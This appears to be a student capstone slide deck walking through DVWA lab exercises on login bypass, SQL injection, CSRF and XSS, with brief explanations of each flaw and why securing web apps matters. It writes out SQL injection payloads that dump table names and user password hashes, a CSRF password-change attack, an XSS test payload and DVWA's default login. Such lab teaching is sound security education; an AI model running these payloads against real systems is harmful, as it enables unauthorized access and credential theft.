Solving Labs for Common Web Vulnerabilities: A Hands-On Guide

Capstone project • Solving Labs for Common Web Vulnerabilities • Login Bypass, Admin Credentials Access (SQLi), CSRF, XSS Aniket Jha

PROJECT OVERVIEW • Introduction • Login Bypass • Admin Credentials Access (SQLi) • Cross-Site Request Forgery (CSRF) • Cross-Site Scripting (XSS) • Conclusion

Introduction •What are Web Vulnerabilities? • Web vulnerabilities are weaknesses in web applications that attackers can exploit to gain unauthorized access, manipulate data, or perform other malicious activities.

Login Bypass •Description: • A technique used by attackers to gain access to an application by bypassing the authentication mechanism. •Example: • Manipulating the login form inputs to bypass authentication checks.

Login Bypass: •Mechanism: • Exploits flaws in the authentication process to gain unauthorized access. •Impact: • Unauthorized access to user accounts, sensitive data, and administrative functions.

SQL Injection (SQLi) •Description: • An attack where malicious SQL code is inserted into an input field to manipulate the backend database. •Example: • Using SQL queries to retrieve or alter data in a database through a vulnerable input field.

SQL Injection (SQLi): •Mechanism: • Manipulates SQL queries by injecting malicious code into input fields. •Impact: • Data breaches, data loss, unauthorized data manipulation, and potential control of the database server.

DVWA SQL INJECTION • Before we begin, we need to ensure that our DVWA security setting is low.

• The flaw in the code you provided is that it is vulnerable to SQL injection attacks. The vulnerability arises from directly concatenating user input into the SQL query without proper sanitization or parameterization. • Here’s an explanation of the flaw and the recommended solution: • In the code, the variable - ID is retrieved from the user input without any validation or sanitization. It is then directly concatenated into the SQL query string:

This allows an attacker to manipulate the value of – ID and inject malicious SQL code, potentially leading to unauthorized access, data leakage, or even complete loss of data.

This means that the query that was executed back in the database was the following: • 1' OR '1'=‘1’#

'UNION SELECT table_name, NULL FROM information_schema.tables --

'UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name= 'users' --

Now we can see we got both username and encrypted password. • 'UNION SELECT user, password FROM users –

Medium We will intercept the request and send it to the repeater.

Edit id=1 to this code then send it and we can see the results in response. • 1 UNION SELECT user, password FROM users –

Cross-Site Request Forgery (CSRF) •Description: • An attack where a malicious website tricks a user's browser into performing an unwanted action on another site where the user is authenticated. •Example: • Forcing a user to transfer funds without their consent.

Cross-Site Request Forgery (CSRF): •Mechanism: • Leverages authenticated user sessions to perform unwanted actions. •Impact: • Unauthorized actions executed on behalf of the user, such as fund transfers, changing account settings, or posting malicious content.

• The vulnerability lies in the fact that the code doesn’t include any mechanism to verify the origin of the request. As a result, an attacker can construct a URL containing the necessary parameters ( Password _new • and password _conf ) and send it to a victim. If the victim clicks on the malicious link while authenticated on the vulnerable website, the code will execute the password change without any further authentication or user consent. • Now, We are going to perform the attack • First, I will Create a new password “123” and click on Change

After changing the password you can see in the url is that it lacks the necessary CSRF token. In the absence of CSRF protection, an attacker can still exploit this vulnerability by tricking the victim into clicking on the URL while logged in to the vulnerable website.

We can see that password has been changed

Cross-Site Scripting (XSS) • Description: • XSS is a technique in which attackers inject malicious scripts into a target website and may allow them to gain access control of the website. If a website allows users to input data like comment, username field and email address field without controls then attacker can insert malicious code script as well. • Example: • Injecting a script that captures cookies and sends them to an attacker.

TYPES OF XSS: •1. Reflected XSS •2. Stored XSS •3. Dom Base XSS

Cross-Site Scripting (XSS): •Mechanism: • Injects malicious scripts into web pages viewed by other users. •Impact: • Theft of user data (cookies, session tokens), spreading malware, and defacement of web content.

Reflected XSS(cross site scripting):RXSS • In this case, hacker data is not stored on the website. reflected XSS only execute on the victim side. reflected cross-site scripting A hacker sends input script that website then reflected back to the victim’s browser, where hacker it executed the malicious JavaScript payloads. • Let’s try cross site scripting virtual environment • Requirements: • 1. DVWA (Damn vulnerable web application) • 2. Browser like Firefox, explorer, chrome, Chrome e.t.c

DVWA High level Reflected XSS: • Payload: <script>alert(“xss”)</script>

• We shall then log in to DVWA with: • username: admin • password: password • Comment Once we are in, we shall go over and set our security level to low as shown below:

Importance of Securing Web Applications • Protect Sensitive Data: • Ensures that personal and financial information is safeguarded against unauthorized access and breaches. • Maintain User Trust: • Users expect their data to be protected. Security breaches can damage the reputation and trustworthiness of an organization.

• Prevent Financial Loss: • Security incidents can result in significant financial losses due to fraud, theft, and the costs associated with incident response and remediation. • Compliance: • Many industries are governed by regulations that mandate specific security measures (e.g., GDPR, HIPAA, PCI-DSS). Failure to comply can result in legal penalties. • Prevent Business Disruption: • Attacks can disrupt business operations, causing downtime and loss of productivity.

Conclusion: •Securing web applications is critical to protecting data, maintaining trust, and ensuring business continuity. • Understanding and mitigating these vulnerabilities can significantly enhance the security posture of any web application.

Q&A • Open the floor for questions !

Solving Labs for Common Web Vulnerabilities: A Hands-On Guide

More Related Content

What's hot

Similar to Solving Labs for Common Web Vulnerabilities: A Hands-On Guide

More from Boston Institute of Analytics

Recently uploaded

Solving Labs for Common Web Vulnerabilities: A Hands-On Guide